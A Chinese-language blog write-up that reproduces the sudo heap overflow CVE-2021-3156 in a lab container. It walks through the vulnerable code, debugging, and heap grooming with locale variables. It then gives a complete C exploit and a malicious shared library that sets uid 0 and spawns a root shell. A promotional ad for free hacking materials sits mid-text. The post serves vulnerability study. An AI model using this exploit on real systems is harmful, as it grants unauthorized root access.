CVE復現之老洞新探(CVE-2021-3156)

原創 原創 2024-05-08 22:52

環境搭建

直接拉取合適的docker

docker 環境:

https://hub.docker.com/r/chenaotian/cve-2021-3156

下載glibc-2.27源碼和sudo-1.8.21源碼

漏洞分析

    /* set user_args */
    if (NewArgc > 1) {
        char *to, *from, **av;
        size_t size, n;

        /* Alloc and build up user_args. */
        for (size = 0, av = NewArgv + 1; *av; av++)
        size += strlen(*av) + 1; //計算command緩衝區的大小,每個command後面跟一個空格符
        if (size == 0 || (user_args = malloc(size)) == NULL) {  //分配堆塊,存放command
        sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
        debug_return_int(-1);
        }
        if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) {  // 設置-s參數進入分支
        /*
         * When running a command via a shell, the sudo front-end
         * escapes potential meta chars.  We unescape non-spaces
         * for sudoers matching and logging purposes.
         */
        for (to = user_args, av = NewArgv + 1; (from = *av); av++) {
            while (*from) {
            if (from[0] == '\\' && !isspace((unsigned char)from[1]))
                from++; // 跳過反斜槓
            *to++ = *from++; // 複製反斜槓後面的字符
            } // 漏洞點在於當結尾是\且後面不是空格時,會from++一次,在拷貝完後還會from++,再去判斷while的條件,就跳過了0,造成了越界寫。
            *to++ = ' '; //每個command後面跟一個空格
        }
        *--to = '\0';
        } else {
        for (to = user_args, av = NewArgv + 1; *av; av++) {
            n = strlcpy(to, *av, size - (to - user_args));
            if (n >= size - (to - user_args)) {
            sudo_warnx(U_("internal error, %s overflow"), __func__);
            debug_return_int(-1);
            }
            to += n;
            *to++ = ' ';
        }
        *--to = '\0';
        }
    }
    }

Untitled

Untitled

Untitled

結合調試,可以對漏洞的情況有更清楚的瞭解。參數以反斜槓結尾會導致寫入一個零字節而繼續賦值下一個參數,在這裏有兩點:

①以反斜槓結尾可導致溢出

②以反斜槓作爲參數可以寫入零字節

同時,被溢出的那個堆塊的大小等於對應參數長度+1。

漏洞調試

glibc源碼

gdb exp
catch exec
b policy_check
b sudoers.c:846

b setlocale
b sudo.c:148
b setlocale.c:369 // strdup
b setlocale.c:398

b nss_load_library
gcc exp.c -o exp2 -lm

漏洞利用

1 利用目標

p ni

Untitled

可以發現service_user結構體在堆上

Untitled

堆塊大小爲0x40

nss_load_library的函數調用流程和相關的數據結構機制

/* Load library.  */
static int

' (service_user *ni)
{
  if (ni->library == NULL) // ni->library等於0進入分支
    {
      /* This service has not yet been used.  Fetch the service
     library for it, creating a new one if need be.  If there
     is no service table from the file, this static variable
     holds the head of the service_library list made from the
     default configuration.  */
      static name_database default_table;
      ni->library = nss_new_service (service_table ?: &default_table,
                     ni->name); // 新建一個ni->library,並將成員初始化
      if (ni->library == NULL)
    return -1;
    }

  if (ni->library->lib_handle == NULL) // ni->library是新建的,lib_handle是0
    {
      /* Load the shared library.  */
      size_t shlen = (7 + strlen (ni->name) + 3
              + strlen (__nss_shlib_revision) + 1);
      int saved_errno = errno;
      char shlib_name[shlen];

      /* Construct shared object name.  */
      __stpcpy (__stpcpy (__stpcpy (__stpcpy (shlib_name,
                          "libnss_"),
                    ni->name),
              ".so"),
        __nss_shlib_revision); // shlib_name經過拼接得到 libnss_+ni->name+.so+__nss_shlib_revision

      ni->library->lib_handle = __libc_dlopen (shlib_name);// 加載動態庫
      if (ni->library->lib_handle == NULL)
    {
      /* Failed to load the library.  */
      ni->library->lib_handle = (void *) -1l;
      __set_errno (saved_errno);
    }

通過對nss_load_library源碼的分析,發現這裏如果能將ni結構體的library覆蓋爲0,name覆蓋成自己的so文件名,具體爲libnss_XXX/test.so.2,其中libnss_是拼接的路徑,XXX/test是name的值,.so.2是拼接上去的,拼接後libnss_XXX/test.so.2表示當前路徑下libnss_XXX文件夾中的test.so.2,我們完成修改後,在當前路徑下創建對應的文件夾,將惡意文件放到其中,更名爲test.so.2,就能加載執行惡意文件。

【---- 幫助網安學習,以下所有學習資料免費領!領取資料加 we~@x:dctintin,備註 “開源中國” 獲取!】

① 網安學習成長路徑思維導圖
② 60 + 網安經典常用工具包
③ 100+SRC 漏洞分析報告
④ 150 + 網安攻防實戰技術電子書
⑤ 最權威 CISSP 認證考試指南 + 題庫
⑥ 超 1800 頁 CTF 實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP 客戶端安全檢測指南(安卓 + IOS)

2 堆塊佈局

接下來,就是需要想辦法將這個service_user結構體放到存在溢出的堆塊下面。

這就來到了第二個問題,setlocale 如何通過環境變量LC_* 進行堆佈局。

// locale\setlocale.c
      /* Load the new data for each category.  */
      while (category-- > 0)
    if (category != LC_ALL)
      {
        newdata[category] = _nl_find_locale (locale_path, locale_path_len,
                         category,
                         &newnames[category]);//通過_nl_find_locale函數去獲取環境變量的值,存放在newdata[category]中

        if (newdata[category] == NULL)
          {
#ifdef NL_CURRENT_INDIRECT
        if (newnames[category] == _nl_C_name)
          /* Null because it's the weak value of _nl_C_LC_FOO.  */
          continue;
#endif
        break;
          }

首先是通過_nl_find_locale函數去獲取環境變量的值,存放在newdata[category]中

// locale\findlocale.c
struct __locale_data *
_nl_find_locale (const char *locale_path, size_t locale_path_len,
         int category, const char **name)
{
    ......
/* LOCALE can consist of up to four recognized parts for the XPG syntax:

        language[_territory[.codeset]][@modifier]

     Beside the first all of them are allowed to be missing.  If the
     full specified locale is not found, the less specific one are
     looked for.  The various part will be stripped off according to
     the following order:
        (1) codeset
        (2) normalized codeset
        (3) territory
        (4) modifier
   */
   //locale的命名規則爲<語言>_<地區>.<字符集編碼>,如zh_CN.UTF-8,zh代表中文,CN代表大陸地區,UTF-8表示字符集。
   // C.UTF-8@AAAAAAAAA
  mask = _nl_explode_name (loc_name, &language, &modifier, &territory,
               &codeset, &normalized_codeset);
               // 判斷四個部分那部分有缺失
  if (mask == -1)
    /* Memory allocate problem.  */
    return NULL;

  /* If exactly this locale was already asked for we have an entry with
     the complete name.  */
  locale_file = _nl_make_l10nflist (&_nl_locale_file_list[category],
                    locale_path, locale_path_len, mask,
                    language, territory, codeset,
                    normalized_codeset, modifier,
                    _nl_category_names.str
                    + _nl_category_name_idxs[category], 0);

  if (locale_file == NULL)
    {
      /* Find status record for addressed locale file.  We have to search
     through all directories in the locale path.  */
      locale_file = _nl_make_l10nflist (&_nl_locale_file_list[category],
                    locale_path, locale_path_len, mask,
                    language, territory, codeset,
                    normalized_codeset, modifier,
                    _nl_category_names.str
                    + _nl_category_name_idxs[category], 1);
      if (locale_file == NULL)
    /* This means we are out of core.  */
    return NULL;
    }

結合源碼和相關資料,可以知道locale的命名規則爲<語言>_<地區>.<字符集編碼>,如zh_CN.UTF-8,zh代表中文,CN代表大陸地區,UTF-8表示字符集。例如C.UTF-8@AAAAAAAAA

堆申請原語和堆釋放原語

// locale\setlocale.c
      /* Load the new data for each category.  */
      while (category-- > 0)
    if (category != LC_ALL)
      {
        newdata[category] = _nl_find_locale (locale_path, locale_path_len,
                         category,
                         &newnames[category]);//通過_nl_find_locale函數去獲取環境變量的值,存放在newdata[category]中

        if (newdata[category] == NULL)
          {
#ifdef NL_CURRENT_INDIRECT
        if (newnames[category] == _nl_C_name)
          /* Null because it's the weak value of _nl_C_LC_FOO.  */
          continue;
#endif
        break;
          }

        /* We must not simply free a global locale since we have
           no control over the usage.  So we mark it as
           un-deletable.  And yes, the 'if' is needed, the data
           might be in read-only memory.  */
        if (newdata[category]->usage_count != UNDELETABLE)
          newdata[category]->usage_count = UNDELETABLE;

        /* Make a copy of locale name.  */
        if (newnames[category] != _nl_C_name)
          {
        if (strcmp (newnames[category],
                _nl_global_locale.__names[category]) == 0)
          newnames[category] = _nl_global_locale.__names[category];
        else
          {
            newnames[category] = __strdup (newnames[category]);
            //使用__strdup函數在堆內存中分配空間,並將newdata[category]拷貝進去
            if (newnames[category] == NULL)
              break;
          }
          }
      }

      /* Create new composite name.  */
      composite = (category >= 0
           ? NULL : new_composite_name (LC_ALL, newnames));
      if (composite != NULL)
    {
      /* Now we have loaded all the new data.  Put it in place.  */
      for (category = 0; category < __LC_LAST; ++category)
        if (category != LC_ALL)
          {
        setdata (category, newdata[category]);
        setname (category, newnames[category]);
          }
      setname (LC_ALL, composite);

      /* We successfully loaded a new locale.  Let the message catalog
         functions know about this.  */
      ++_nl_msg_cat_cntr;
    }
      else
    for (++category; category < __LC_LAST; ++category)
      if (category != LC_ALL && newnames[category] != _nl_C_name
          && newnames[category] != _nl_global_locale.__names[category])
        free ((char *) newnames[category]);
        //這裏就是堆塊釋放的原語了,只要有一個區域設置的值不符合規範,則將之前所有申請的堆塊都釋放掉

先使用__strdup函數在堆內存中分配空間,並將newdata[category]拷貝進去,其中

char * __strdup(const char *s)
{
   size_t  len = strlen(s) +1;
   void *new = malloc(len);
   if (new == NULL)
      return NULL;
   return (char *)memecpy(new,s,len);
}

然後當遇到不合法的區域的值時,就會將前面申請的堆都free掉。

locale把按照所涉及到的使用習慣的各個方面分成12個大類,這12個大類分別是:

1、語言符號及其分類(LC_CTYPE) 

2、數字(LC_NUMERIC) 

3、比較和習慣(LC_COLLATE) 

4、時間顯示格式(LC_TIME) 

5、貨幣單位(LC_MONETARY) 

6、信息主要是提示信息,錯誤信息,狀態信息,標題,標籤,按鈕和菜單等(LC_MESSAGES) 

7、姓名書寫方式(LC_NAME) 

8、地址書寫方式(LC_ADDRESS) 

9、電話號碼書寫方式(LC_TELEPHONE) 

10、度量衡表達方式 (LC_MEASUREMENT) 

11、默認紙張尺寸大小(LC_PAPER) 

12、對locale自身包含信息的概述(LC_IDENTIFICATION)

對應

"LC_CTYPE"
"LC_NUMERIC"
"LC_TIME"
"LC_COLLATE"
"LC_MONETARY",
"LC_MESSAGES"
"LC_ALL"
"LC_PAPER"
"LC_NAME"
"LC_ADDRESS"
"LC_TELEPHONE"
"LC_MEASUREMENT"
"LC_IDENTIFICATION"

其中,處理是從下往上的順序處理的,所以在傳參的時候要注意一下順序,不然最開始就錯誤全部釋放掉了。

接下里就是想要如何將一個service_user申請到前面我的堆塊前面

可以在申請service_user前,先利用堆申請原語和堆釋放原語挖好坑。由於知道service_user的chunk大小是0x40,而我們堆溢出的chunk的大小可以自己控制,只要保證大小對應,就可以了。

通過動態調試可以明確__strdup的參數是C.UTF-8@XXXXXX,所以得到的堆塊size是參數長度+1,利用下面腳本生成目標size的內容。

length = 0x38
while(length < 0x100):
    tail = 'C.UTF-8@'
    # length = 0x48
    q = "a"*(length-2)+"\\"
    p = tail+'a'*(length-1-len(tail))
    print(hex(length))
    print(q)
    print(p)
    length += 0x10

經過測試,先按照0x40,0x40,0xa0,0x40的順序設置4個,再設置一個不合法的,可以在中間一些無法避免的堆塊操作後得到一個可利用的堆排布。最後設置一個非法的值。

"LC_IDENTIFICATION=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"LC_MEASUREMENT=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"LC_TELEPHONE=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"LC_ADDRESS=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"LC_NAME=xxxxxxxx"

其中0xa0是爲堆溢出的堆塊留的坑

    /* set user_args */
    if (NewArgc > 1) {
        char *to, *from, **av;
        size_t size, n;

        /* Alloc and build up user_args. */
        for (size = 0, av = NewArgv + 1; *av; av++)
        size += strlen(*av) + 1;
        if (size == 0 || (user_args = malloc(size)) == NULL) {
        sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
        debug_return_int(-1);
        }

在malloc前下斷點·

b sudoers.c:849

查看bins,可以看到tcachebins中0xa0正好有一個堆塊

Untitled

然後在nss_load_library下斷點,查看service_user

b nss_load_library
p ni

Untitled

可以看到前面0xa0的堆塊在service_user的前面,這樣就可以通過溢出覆蓋name字段

所以填坑的參數按照前面的分析應該是

"a"*(0x98-1)+"\\"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\"

綜合得到如下初步exp

#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<math.h>

#define __LC_CTYPE               0
#define __LC_NUMERIC             1
#define __LC_TIME                2
#define __LC_COLLATE             3
#define __LC_MONETARY            4
#define __LC_MESSAGES            5
#define __LC_ALL                 6
#define __LC_PAPER               7
#define __LC_NAME                8
#define __LC_ADDRESS             9
#define __LC_TELEPHONE          10
#define __LC_MEASUREMENT        11
#define __LC_IDENTIFICATION     12

char * envName[13]={"LC_CTYPE","LC_NUMERIC","LC_TIME","LC_COLLATE","LC_MONETARY","LC_MESSAGES","LC_ALL","LC_PAPER","LC_NAME","LC_ADDRESS","LC_TELEPHONE","LC_MEASUREMENT","LC_IDENTIFICATION"};

int main()
{
    char *argv[] = {"sudoedit","-s","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\",NULL};// malloc(size) size = arg1_len + 1
    char *env[] = {"XXX/test","LC_IDENTIFICATION=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","LC_MEASUREMENT=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","LC_TELEPHONE=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","LC_ADDRESS=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","LC_NAME=xxxxxxxx",NULL};
    execve("/usr/local/bin/sudoedit",argv,env);
}

3 溢出利用

Untitled

當前exp把XXX/test寫到了0x555555623b07

Untitled

此時的service_user在0x5555556241b0,name的偏移是0x30

start = 0x555555623b07
end = 0x5555556241b0+0x30
n = end-start
print(n)
for i in range(n):
    print('"\\\\"',end=',')  

前面知道以反斜槓作爲單獨的參數,能夠寫入\x00,由於這裏需要把library字段覆蓋爲0,所以通過上述代碼生成相應數量的反斜槓,並填在XXX/test前,將XXX/test填入name的同時將library填爲0。

共1753個反斜槓

exp

#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<math.h>

#define __LC_CTYPE               0
#define __LC_NUMERIC             1
#define __LC_TIME                2
#define __LC_COLLATE             3
#define __LC_MONETARY            4
#define __LC_MESSAGES            5
#define __LC_ALL                 6
#define __LC_PAPER               7
#define __LC_NAME                8
#define __LC_ADDRESS             9
#define __LC_TELEPHONE          10
#define __LC_MEASUREMENT        11
#define __LC_IDENTIFICATION     12

char * envName[13]={"LC_CTYPE","LC_NUMERIC","LC_TIME","LC_COLLATE","LC_MONETARY","LC_MESSAGES","LC_ALL","LC_PAPER","LC_NAME","LC_ADDRESS","LC_TELEPHONE","LC_MEASUREMENT","LC_IDENTIFICATION"};

int main()
{
    char *argv[] = {"sudoedit","-s","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\",NULL};// malloc(size) size = arg1_len + 1
    char *env[] = {"\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","\\","XXX/test","LC_IDENTIFICATION=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","LC_MEASUREMENT=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","LC_TELEPHONE=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","LC_ADDRESS=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","LC_NAME=xxxxxxxx",NULL};
    execve("/usr/local/bin/sudoedit",argv,env);
}

Untitled

覆蓋結果如上

拼接完成後會執行

      /* Construct shared object name.  */
      __stpcpy (__stpcpy (__stpcpy (__stpcpy (shlib_name,
                          "libnss_"),
                    ni->name),
              ".so"),
        __nss_shlib_revision);

      ni->library->lib_handle = __libc_dlopen (shlib_name);
      if (ni->library->lib_handle == NULL)
    {
      /* Failed to load the library.  */
      ni->library->lib_handle = (void *) -1l;
      __set_errno (saved_errno);
    }

通過__libc_dlopen打開文件

Untitled

4 提權收工

最後編譯後門test.so.2,並放入libnss_XXX文件夾

這裏借用CVE-2021-3156:sudo堆溢出提權漏洞分析-騰訊雲開發者社區-騰訊雲 (tencent.com)中的代碼

#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define EXECVE_SHELL_PATH "/bin/sh"

static void __attribute__ ((constructor)) pop_shell(void);
char *n[] = {NULL};

void pop_shell(void) {
    printf("[+] executed!\n");
    setresuid(0, 0, 0);
    setresgid(0, 0, 0);
    if(getuid() == 0) {
        puts("[+] we are root!");
    } else {
        puts("[-] something went wrong!");
        exit(0);
    }

    execve(EXECVE_SHELL_PATH, n, n);
}
gcc -fPIC -shared test.c -o libnss_XXX/test.so.2
chmod 777 libnss_XXX/test.so.2

提權效果

Untitled

總結

這個老洞新探,還是挺有意思的, 從源碼分析到動態調試,整個過程對程序調試的能力有很大的鍛鍊。在這個洞的利用中,思路是比較清晰的,但在堆排布那裏,由於中間會有很多其他的堆塊操作是我們不可控,就會存在較大困難,要麼通過逆向分析梳理所有的堆塊操作然後手動構造,要麼就是通過fuzz。前者費時費力,而且存在很多問題,後者需要對fuzz進行一定的學習。在盲目手動構造的過程中,好不容易在service_user之前留下了坑,但還是遇到了幾種情況,一是在沒有加溢出的時候的service_user結構體的地址和加了溢出字符後的不一樣,二是在根本走不到nss_load_library就崩潰了,三是修改了最近的一個service_user結構體,但並沒有用。

總的來說,這個洞還有很多可以學習的地方,後面學學fuzz後再來試試這個洞。

  

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

MQTTX 1.9.10 發佈:升級 Faker.js、增強連接與訂閱診斷、優化 UI

